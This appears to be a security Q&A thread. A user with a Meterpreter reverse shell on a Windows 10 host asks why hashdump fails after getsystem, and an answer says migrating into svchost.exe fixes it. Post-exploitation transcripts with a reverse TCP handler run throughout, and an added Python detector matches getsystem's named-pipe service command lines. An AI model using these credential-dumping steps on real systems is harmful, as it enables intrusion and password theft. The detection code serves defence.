
I am facing a very weird issue. I have successfully popped a box using Shellter with Meterpreter_Reverse TCP.

Here is the sysinfo :

meterpreter > sysinfo
Computer        : ********
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows

Now the weird thing is when I type :

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

It says that I have got NT Authority, however when I type :

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeAssignPrimaryTokenPrivilege
  SeChangeNotifyPrivilege
  SeCreateGlobalPrivilege
  SeDebugPrivilege
  SeImpersonatePrivilege
  SeSystemProfilePrivilege
  SeTcbPrivilege

These are just the privileges that I get. Not all. If I try to use hashdump :

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Also, I have already migrated to another NT Authority Process, in this case ( svchost.exe )

If I try to run any background local exploit it says that the system is already elevated.

msf exploit(ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 192.168.0.100:4444
[-] Exploit aborted due to failure: none: Session is already elevated

Also, if I try to use the "ASK" exploit to gain privilege, this is what happens :

msf exploit(ask) > run

[*] Started reverse TCP handler on 192.168.0.100:4444
[+] UAC is not enabled, no prompt for the user
[*] Uploading eobKMikmOsnWp.exe - 73802 bytes to the filesystem...
[*] Executing Command!

And it just freezes, and no prompt is given on the victim's computer.

Also any command I try to run, it just gives me an error stating that I don't have access:

meterpreter > kill 7744
Killing: 7744
[-] stdapi_sys_process_kill: Operation failed: Access is denied.

I am totally lost to understand what exactly is happening here? It says that I have gained the access of the system, but still I am not able to do anything?

Why?

Any help would be appreciated.

Sankalp Singha
  • Quite strange... my list of privileges once elevated over a "meterpreted" w10 is larger. Anyway, I have the same result on `hashdump`, same output. Maybe something changed on Windows in an update and the script is not updated, IDK. – OscarAkaElvis Jul 09 '17 at 21:51
  • Yeah, but I want to know if there is a fix for this? I have no clue why the hell this is happening :/ – Sankalp Singha Jul 10 '17 at 07:26
  • I have experienced similar issues, while I haven't investigated the root cause I have been able to work around it simply by migrating to a different process. – wireghoul Jul 14 '17 at 02:26
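
For defenders: `getsystem` technique 1 from the question (Named Pipe Impersonation) is publicly documented as installing a short-lived service whose command line echoes into a named pipe, which Windows records as System log event 7045. The following is an added example, not part of the original post or of Metasploit: a check for that pattern over already-parsed event records. The dict layout, the function name `find_pipe_echo_services` and the sample records are assumptions constructed for illustration.

```python
import re

# Service command line that echoes a token into a named pipe, e.g.
#   cmd.exe /c echo abcdef > \\.\pipe\abcdef
# Accepts cmd, cmd.exe or %COMSPEC% as the interpreter.
PIPE_ECHO = re.compile(
    r"(?:cmd(?:\.exe)?|%comspec%)\s+/c\s+echo\s+\S+\s*>\s*"
    r"\\\\\.\\pipe\\(?P<pipe>[\w.-]+)",
    re.IGNORECASE,
)

SERVICE_INSTALLED = 7045  # System log: "A service was installed in the system"


def find_pipe_echo_services(events):
    """Return (service name, pipe name) for each matching service install."""
    hits = []
    for ev in events:
        # Only service-installation events carry the ImagePath we care about.
        if ev.get("EventID") != SERVICE_INSTALLED:
            continue
        match = PIPE_ECHO.search(ev.get("ImagePath", ""))
        if match:
            hits.append((ev.get("ServiceName", "?"), match.group("pipe")))
    return hits


# Constructed sample records (assumed shape; not from the page or a real host).
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "qwhzdr",
     "ImagePath": r"cmd.exe /c echo qwhzdr > \\.\pipe\qwhzdr"},
    {"EventID": 7045, "ServiceName": "xkpmva",
     "ImagePath": r"%COMSPEC% /c echo xkpmva > \\.\pipe\xkpmva"},
    # Ordinary service install: must not match.
    {"EventID": 7045, "ServiceName": "Print Spooler Helper",
     "ImagePath": r"C:\Windows\System32\spoolhelper.exe -k"},
    # Same command line under a different event ID: ignored.
    {"EventID": 7036, "ServiceName": "qwhzdr",
     "ImagePath": r"cmd.exe /c echo qwhzdr > \\.\pipe\qwhzdr"},
]

if __name__ == "__main__":
    for name, pipe in find_pipe_echo_services(SAMPLE_EVENTS):
        print(f"suspicious service install: {name!r} writes to pipe {pipe!r}")
```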

2 Answers


Is the target using EMET? Specifically, the application whitelisting? Also, any sort of AV?

Also, maybe it's because you didn't set the session, which both hashdump and getsystem rely on. It might also stop you from getting an interactive shell!:

https://www.offensive-security.com/metasploit-unleashed/john-ripper/
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/

Last, can you use a payload other than meterpreter (e.g. generated via msfvenom) instead?

grepNstepN

As the OP states, I received the same error/output after initially escalating privs to system.

meterpreter > hashdump 
[-] 2007: Operation failed: The parameter is incorrect.

I remembered that during the exploit there was output saying that notepad was being used to kick it off. So I ran getpid and ps to see what my current process was.

Turned out I was still running as notepad.exe. I decided to try the migrate tool within meterpreter and move to an svchost.exe process, e.g. migrate 500 ..

After migration completed successfully I was able to run hashdump as usual.

schroeder
snyd0g